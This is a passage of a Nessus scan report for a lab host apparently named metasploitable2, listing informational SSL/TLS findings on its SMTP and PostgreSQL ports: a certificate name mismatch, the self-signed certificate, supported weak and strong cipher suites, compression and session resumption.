Plugin Information
Published: 2011/12/01, Modified: 2025/06/16
Plugin Output

tcp/5432/postgresql


This port supports SSLv3/TLSv1.0.

45410 - SSL Certificate 'commonName' Mismatch
-
Synopsis
The 'commonName' (CN) attribute in the SSL certificate does not match the hostname.
Description
The service running on the remote host presents an SSL certificate for which the 'commonName' (CN) attribute does not match the hostname on which the service listens.
Solution
If the machine has several names, make sure that users connect to the service through the DNS hostname that matches the common name in the certificate.
Risk Factor
None
Plugin Information
Published: 2010/04/03, Modified: 2021/03/09
Plugin Output

tcp/25/smtp


The host names known by Nessus are :

04cbebc48a57
metasploitable2.sicurform

The Common Name in the certificate is :

ubuntu804-base.localdomain

45410 - SSL Certificate 'commonName' Mismatch
-
Synopsis
The 'commonName' (CN) attribute in the SSL certificate does not match the hostname.
Description
The service running on the remote host presents an SSL certificate for which the 'commonName' (CN) attribute does not match the hostname on which the service listens.
Solution
If the machine has several names, make sure that users connect to the service through the DNS hostname that matches the common name in the certificate.
Risk Factor
None
Plugin Information
Published: 2010/04/03, Modified: 2021/03/09
Plugin Output

tcp/5432/postgresql


The host names known by Nessus are :

04cbebc48a57
metasploitable2.sicurform

The Common Name in the certificate is :

ubuntu804-base.localdomain

10863 - SSL Certificate Information
-
Synopsis
This plugin displays the SSL certificate.
Description
This plugin connects to every SSL-related port and attempts to extract and dump the X.509 certificate.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2008/05/19, Modified: 2021/02/03
Plugin Output

tcp/25/smtp

Subject Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Issuer Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Serial Number: 00 FA F9 3A 4C 7F B6 B9 CC

Version: 1

Signature Algorithm: SHA-1 With RSA Encryption

Not Valid Before: Mar 17 14:07:45 2010 GMT
Not Valid After: Apr 16 14:07:45 2010 GMT

Public Key Info:

Algorithm: RSA Encryption
Key Length: 1024 bits
Public Key: 00 D6 B4 13 36 33 9A 95 71 7B 1B DE 7C 83 75 DA 71 B1 3C A9
7F FE AD 64 1B 77 E9 4F AE BE CA D4 F8 CB EF AE BB 43 79 24
73 FF 3C E5 9E 3B 6D FC C8 B1 AC FA 4C 4D 5E 9B 4C 99 54 0B
D7 A8 4A 50 BA A9 DE 1D 1F F4 E4 6B 02 A3 F4 6B 45 CD 4C AF
8D 89 62 33 8F 65 BB 36 61 9F C4 2C 73 C1 4E 2E A0 A8 14 4E
98 70 46 61 BB D1 B9 31 DF 8C 99 EE 75 6B 79 3C 40 A0 AE 97
00 90 9D DC 99 0D 33 A4 B5
Exponent: 01 00 01

Signature Length: 128 bytes / 1024 bits
Signature: 00 92 A4 B4 B8 14 55 63 25 51 4A 0B C3 2A 22 CF 3A F8 17 6A
0C CF 66 AA A7 65 2F 48 6D CD E3 3E 5C 9F 77 6C D4 44 54 1F
1E 84 4F 8E D4 8D DD AC 2D 88 09 21 A8 DA 56 2C A9 05 3C 49
68 35 19 75 0C DA 53 23 88 88 19 2D 74 26 C1 22 65 EE 11 68
83 6A 53 4A 9C 27 CB A0 B4 E9 8D 29 0C B2 3C 18 5C 67 CC 53
A6 1E 30 D0 AA 26 7B 1E AE 40 B9 29 01 6C 2E BC A2 19 94 7C
15 6E 8D 30 38 F6 CA 2E 75

Fingerprints :

SHA-256 Fingerprint: E7 A7 FA 0D 63 E4 57 C7 C4 A5 9B 38 B7 08 49 C6 A7 0B DA 6F
83 0C 7A F1 E3 2D EE 43 6D E8 13 CC
SHA-1 Fingerprint: ED 09 30 88 70 66 03 BF D5 DC 23 73 99 B4 98 DA 2D 4D 31 C6
MD5 Fingerprint: DC D9 AD 90 6C 8F 2F 73 74 AF 38 3B 25 40 88 28


PEM certificate :

-----BEGIN CERTIFICATE-----
MIIDWzCCAsQCCQD6+TpMf7a5zDANBgkqhkiG9w0BAQUFADCB8TELMAkGA1UEBhMCWFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzETMBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09mZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWlyczEjMCEGA1UEAxMadWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4xLjAsBgkqhkiG9w0BCQEWH3Jvb3RAdWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4wHhcNMTAwMzE3MTQwNzQ1WhcNMTAwNDE2MTQwNzQ1WjCB8TELMAkGA1UEBhMCWFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzETMBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09mZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWlyczEjMCEGA1UEAxMadWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4xLjAsBgkqhkiG9w0BCQEWH3Jvb3RAdWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANa0EzYzmpVxexvefIN12nGxPKl//q1kG3fpT66+ytT4y++uu0N5JHP/POWeO238yLGs+kxNXptMmVQL16hKULqp3h0f9ORrAqP0a0XNTK+NiWIzj2W7NmGfxCxzwU4uoKgUTphwRmG70bkx34yZ7nVreTxAoK6XAJCd3JkNM6S1AgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAkqS0uBRVYyVRSgvDKiLPOvgXagzPZqqnZS9Ibc3jPlyfd2zURFQfHoRPjtSN3awtiAkhqNpWLKkFPEloNRl1DNpTI4iIGS10JsEiZe4RaINqU0qcJ8ugtOmNKQyyPBhcZ8xTph4w0Komex6uQLkpAWwuvKIZlHwVbo0wOPbKLnU=
-----END CERTIFICATE-----

10863 - SSL Certificate Information
-
Synopsis
This plugin displays the SSL certificate.
Description
This plugin connects to every SSL-related port and attempts to extract and dump the X.509 certificate.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2008/05/19, Modified: 2021/02/03
Plugin Output

tcp/5432/postgresql

Subject Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Issuer Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Serial Number: 00 FA F9 3A 4C 7F B6 B9 CC

Version: 1

Signature Algorithm: SHA-1 With RSA Encryption

Not Valid Before: Mar 17 14:07:45 2010 GMT
Not Valid After: Apr 16 14:07:45 2010 GMT

Public Key Info:

Algorithm: RSA Encryption
Key Length: 1024 bits
Public Key: 00 D6 B4 13 36 33 9A 95 71 7B 1B DE 7C 83 75 DA 71 B1 3C A9
7F FE AD 64 1B 77 E9 4F AE BE CA D4 F8 CB EF AE BB 43 79 24
73 FF 3C E5 9E 3B 6D FC C8 B1 AC FA 4C 4D 5E 9B 4C 99 54 0B
D7 A8 4A 50 BA A9 DE 1D 1F F4 E4 6B 02 A3 F4 6B 45 CD 4C AF
8D 89 62 33 8F 65 BB 36 61 9F C4 2C 73 C1 4E 2E A0 A8 14 4E
98 70 46 61 BB D1 B9 31 DF 8C 99 EE 75 6B 79 3C 40 A0 AE 97
00 90 9D DC 99 0D 33 A4 B5
Exponent: 01 00 01

Signature Length: 128 bytes / 1024 bits
Signature: 00 92 A4 B4 B8 14 55 63 25 51 4A 0B C3 2A 22 CF 3A F8 17 6A
0C CF 66 AA A7 65 2F 48 6D CD E3 3E 5C 9F 77 6C D4 44 54 1F
1E 84 4F 8E D4 8D DD AC 2D 88 09 21 A8 DA 56 2C A9 05 3C 49
68 35 19 75 0C DA 53 23 88 88 19 2D 74 26 C1 22 65 EE 11 68
83 6A 53 4A 9C 27 CB A0 B4 E9 8D 29 0C B2 3C 18 5C 67 CC 53
A6 1E 30 D0 AA 26 7B 1E AE 40 B9 29 01 6C 2E BC A2 19 94 7C
15 6E 8D 30 38 F6 CA 2E 75

Fingerprints :

SHA-256 Fingerprint: E7 A7 FA 0D 63 E4 57 C7 C4 A5 9B 38 B7 08 49 C6 A7 0B DA 6F
83 0C 7A F1 E3 2D EE 43 6D E8 13 CC
SHA-1 Fingerprint: ED 09 30 88 70 66 03 BF D5 DC 23 73 99 B4 98 DA 2D 4D 31 C6
MD5 Fingerprint: DC D9 AD 90 6C 8F 2F 73 74 AF 38 3B 25 40 88 28


PEM certificate :

-----BEGIN CERTIFICATE-----
MIIDWzCCAsQCCQD6+TpMf7a5zDANBgkqhkiG9w0BAQUFADCB8TELMAkGA1UEBhMCWFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzETMBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09mZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWlyczEjMCEGA1UEAxMadWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4xLjAsBgkqhkiG9w0BCQEWH3Jvb3RAdWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4wHhcNMTAwMzE3MTQwNzQ1WhcNMTAwNDE2MTQwNzQ1WjCB8TELMAkGA1UEBhMCWFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzETMBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09mZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWlyczEjMCEGA1UEAxMadWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4xLjAsBgkqhkiG9w0BCQEWH3Jvb3RAdWJ1bnR1ODA0LWJhc2UubG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANa0EzYzmpVxexvefIN12nGxPKl//q1kG3fpT66+ytT4y++uu0N5JHP/POWeO238yLGs+kxNXptMmVQL16hKULqp3h0f9ORrAqP0a0XNTK+NiWIzj2W7NmGfxCxzwU4uoKgUTphwRmG70bkx34yZ7nVreTxAoK6XAJCd3JkNM6S1AgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAkqS0uBRVYyVRSgvDKiLPOvgXagzPZqqnZS9Ibc3jPlyfd2zURFQfHoRPjtSN3awtiAkhqNpWLKkFPEloNRl1DNpTI4iIGS10JsEiZe4RaINqU0qcJ8ugtOmNKQyyPBhcZ8xTph4w0Komex6uQLkpAWwuvKIZlHwVbo0wOPbKLnU=
-----END CERTIFICATE-----

70544 - SSL Cipher Block Chaining Cipher Suites Supported
-
Synopsis
The remote service supports the use of SSL Cipher Block Chaining ciphers, which combine previous blocks with subsequent ones.
Description
The remote host supports the use of SSL ciphers that operate in Cipher Block Chaining (CBC) mode. These cipher suites offer additional security over Electronic Codebook (ECB) mode, but have the potential to leak information if used improperly.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2013/10/22, Modified: 2021/02/03
Plugin Output

tcp/25/smtp


Here is the list of SSL CBC ciphers supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
DES-CBC-SHA 0x00, 0x09 RSA RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 0x07, 0x00, 0xC0 RSA RSA 3DES-CBC(168) MD5
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
ADH-AES128-SHA 0x00, 0x34 DH None AES-CBC(128) SHA1
ADH-AES256-SHA 0x00, 0x3A DH None AES-CBC(256) SHA1
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

70544 - SSL Cipher Block Chaining Cipher Suites Supported
-
Synopsis
The remote service supports the use of SSL Cipher Block Chaining ciphers, which combine previous blocks with subsequent ones.
Description
The remote host supports the use of SSL ciphers that operate in Cipher Block Chaining (CBC) mode. These cipher suites offer additional security over Electronic Codebook (ECB) mode, but have the potential to leak information if used improperly.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2013/10/22, Modified: 2021/02/03
Plugin Output

tcp/5432/postgresql


Here is the list of SSL CBC ciphers supported by the remote server :

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

21643 - SSL Cipher Suites Supported
-
Synopsis
The remote service encrypts communications using SSL.
Description
This plugin detects which SSL ciphers are supported by the remote service for encrypting communications.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2006/06/05, Modified: 2024/09/11
Plugin Output

tcp/25/smtp


Here is the list of SSL ciphers supported by the remote server :
Each group is reported per SSL Version.

SSL Version : TLSv1
Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export
DES-CBC-SHA 0x00, 0x09 RSA RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
ADH-AES128-SHA 0x00, 0x34 DH None AES-CBC(128) SHA1
ADH-AES256-SHA 0x00, 0x3A DH None AES-CBC(256) SHA1
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1
RC4-MD5 0x00, 0x04 RSA RSA RC4(128) MD5
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1


SSL Version : SSLv3
Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export
DES-CBC-SHA 0x00, 0x09 RSA RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
ADH-AES128-SHA 0x00, 0x34 DH None AES-CBC(128) SHA1
ADH-AES256-SHA 0x00, 0x3A DH None AES-CBC(256) SHA1
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1
RC4-MD5 0x00, 0x04 RSA RSA RC4(128) MD5
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1


SSL Version : SSLv2
Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 0x07, 0x00, 0xC0 RSA RSA 3DES-CBC(168) MD5

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 0x01, 0x00, 0x80 RSA RSA RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

Note that this service does not encrypt traffic by default but does
support upgrading to an encrypted connection using STARTTLS.

21643 - SSL Cipher Suites Supported
-
Synopsis
The remote service encrypts communications using SSL.
Description
This plugin detects which SSL ciphers are supported by the remote service for encrypting communications.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2006/06/05, Modified: 2024/09/11
Plugin Output

tcp/5432/postgresql


Here is the list of SSL ciphers supported by the remote server :
Each group is reported per SSL Version.

SSL Version : TLSv1
Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1


SSL Version : SSLv3
Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

Note that this service does not encrypt traffic by default but does
support upgrading to an encrypted connection using STARTTLS.

62563 - SSL Compression Methods Supported
-
Synopsis
The remote service supports one or more compression methods for SSL connections.
Description
This script detects which compression methods are supported by the remote service for SSL connections.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2012/10/16, Modified: 2022/04/11
Plugin Output

tcp/25/smtp


Nessus was able to confirm that the following compression method is
supported by the target :

DEFLATE (0x01)

62563 - SSL Compression Methods Supported
-
Synopsis
The remote service supports one or more compression methods for SSL connections.
Description
This script detects which compression methods are supported by the remote service for SSL connections.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2012/10/16, Modified: 2022/04/11
Plugin Output

tcp/5432/postgresql


Nessus was able to confirm that the following compression method is
supported by the target :

DEFLATE (0x01)

57041 - SSL Perfect Forward Secrecy Cipher Suites Supported
-
Synopsis
The remote service supports the use of SSL Perfect Forward Secrecy ciphers, which maintain confidentiality even if the key is stolen.
Description
The remote host supports the use of SSL ciphers that offer Perfect Forward Secrecy (PFS) encryption. These cipher suites ensure that recorded SSL traffic cannot be broken at a future date if the server's private key is compromised.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/12/07, Modified: 2021/03/09
Plugin Output

tcp/25/smtp


Here is the list of SSL PFS ciphers supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

57041 - SSL Perfect Forward Secrecy Cipher Suites Supported
-
Synopsis
The remote service supports the use of SSL Perfect Forward Secrecy ciphers, which maintain confidentiality even if the key is stolen.
Description
The remote host supports the use of SSL ciphers that offer Perfect Forward Secrecy (PFS) encryption. These cipher suites ensure that recorded SSL traffic cannot be broken at a future date if the server's private key is compromised.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/12/07, Modified: 2021/03/09
Plugin Output

tcp/5432/postgresql


Here is the list of SSL PFS ciphers supported by the remote server :

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

51891 - SSL Session Resume Supported
-
Synopsis
The remote host allows resuming SSL sessions.
Description
This script detects whether a host allows resuming SSL sessions by performing a full SSL handshake to receive a session ID, and then reconnecting with the previously used session ID. If the server accepts the session ID in the second connection, the server maintains a cache of sessions that can be resumed.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/02/07, Modified: 2021/09/13
Plugin Output

tcp/25/smtp


This port supports resuming SSLv3 sessions.
156899 - SSL/TLS Recommended Cipher Suites
-
Synopsis
The remote host advertises discouraged SSL/TLS ciphers.
Description
The remote host has open SSL/TLS ports which advertise discouraged cipher suites. It is recommended to only enable support for the following cipher suites:

TLSv1.3:
- 0x13,0x01 TLS13_AES_128_GCM_SHA256
- 0x13,0x02 TLS13_AES_256_GCM_SHA384
- 0x13,0x03 TLS13_CHACHA20_POLY1305_SHA256

TLSv1.2:
- 0xC0,0x2B ECDHE-ECDSA-AES128-GCM-SHA256
- 0xC0,0x2F ECDHE-RSA-AES128-GCM-SHA256
- 0xC0,0x2C ECDHE-ECDSA-AES256-GCM-SHA384
- 0xC0,0x30 ECDHE-RSA-AES256-GCM-SHA384
- 0xCC,0xA9 ECDHE-ECDSA-CHACHA20-POLY1305
- 0xCC,0xA8 ECDHE-RSA-CHACHA20-POLY1305

This is the recommended configuration for the vast majority of services, as it is highly secure and compatible with nearly every client released in the last five (or more) years.
See Also
Solution
Only enable support for recommened cipher suites.
Risk Factor
None
Plugin Information
Published: 2022/01/20, Modified: 2024/02/12
Plugin Output

tcp/25/smtp

The remote host has listening SSL/TLS ports which advertise the discouraged cipher suites outlined below:


Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export
